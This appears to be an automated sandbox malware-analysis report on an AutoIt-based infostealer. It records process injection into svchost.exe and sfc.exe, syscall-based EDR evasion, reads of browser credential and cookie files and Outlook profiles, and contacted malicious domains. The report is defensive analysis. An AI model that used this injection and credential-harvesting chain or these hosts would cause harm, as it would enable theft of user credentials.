                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtCreateUserProcess: Direct from: 0x77D3371CJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtQueryInformationProcess: Direct from: 0x77D32C26Jump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtResumeThread: Direct from: 0x77D32FBCJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtDelayExecution: Direct from: 0x77D32DDCJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtQueryAttributesFile: Direct from: 0x77D32E6CJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtSetInformationThread: Direct from: 0x77D32B4CJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtReadVirtualMemory: Direct from: 0x77D32E8CJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtCreateKey: Direct from: 0x77D32C6CJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtClose: Direct from: 0x77D32B6C
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtAllocateVirtualMemory: Direct from: 0x77D33C9CJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtWriteVirtualMemory: Direct from: 0x77D3490CJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtOpenSection: Direct from: 0x77D32E0CJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtQueryVolumeInformationFile: Direct from: 0x77D32F2CJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtProtectVirtualMemory: Direct from: 0x77D27B2EJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtAllocateVirtualMemory: Direct from: 0x77D348ECJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtAllocateVirtualMemory: Direct from: 0x77D32BECJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtDeviceIoControlFile: Direct from: 0x77D32AECJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtQuerySystemInformation: Direct from: 0x77D348CCJump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\sfc.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeThread register set: target process: 4388Jump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeThread APC queued: target process: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeJump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4E4008Jump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_001287B1 LogonUserW,0_2_001287B1
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000D3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_000D3B3A
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_001312C7 SendInput,keybd_event,0_2_001312C7
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_00134C27 mouse_event,0_2_00134C27
                Source: C:\Users\user\Desktop\g1V10ssekg.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\g1V10ssekg.exe"Jump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_00127CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00127CAF
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0012874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0012874B
                Source: g1V10ssekg.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000002.00000002.3333016143.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000002.00000000.1086044199.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000000.1234634286.0000000001850000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: g1V10ssekg.exe, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000002.00000002.3333016143.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000002.00000000.1086044199.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000000.1234634286.0000000001850000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000002.00000002.3333016143.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000002.00000000.1086044199.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000000.1234634286.0000000001850000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000002.00000002.3333016143.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000002.00000000.1086044199.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000000.1234634286.0000000001850000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000F862B cpuid 0_2_000F862B
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_00104E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00104E87
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_00111E06 GetUserNameW,0_2_00111E06
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000D49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000D49A0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.310000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.310000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1161823504.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3333620772.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1170054720.00000000063C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3333538380.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3332033711.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3333539059.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1162534386.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: g1V10ssekg.exeBinary or memory string: WIN_81
                Source: g1V10ssekg.exeBinary or memory string: WIN_XP
                Source: g1V10ssekg.exeBinary or memory string: WIN_XPe
                Source: g1V10ssekg.exeBinary or memory string: WIN_VISTA
                Source: g1V10ssekg.exeBinary or memory string: WIN_7
                Source: g1V10ssekg.exeBinary or memory string: WIN_8
                Source: g1V10ssekg.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.310000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.310000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1161823504.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3333620772.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1170054720.00000000063C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3333538380.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3332033711.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3333539059.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1162534386.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_00146747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00146747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632333 Sample: g1V10ssekg.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 28 www.l33900.xyz 2->28 30 www.031233226.xyz 2->30 32 17 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 4 other signatures 2->50 10 g1V10ssekg.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 5JxkCj4eQRzcmUJqY16X4Zy.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 sfc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 5JxkCj4eQRzcmUJqY16X4Zy.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.cruycq.info 47.83.1.90, 49699, 49700, 49701 VODANETInternationalIP-BackboneofVodafoneDE United States 22->34 36 www.milp.store 194.9.94.85, 49711, 49712, 49713 LOOPIASE Sweden 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.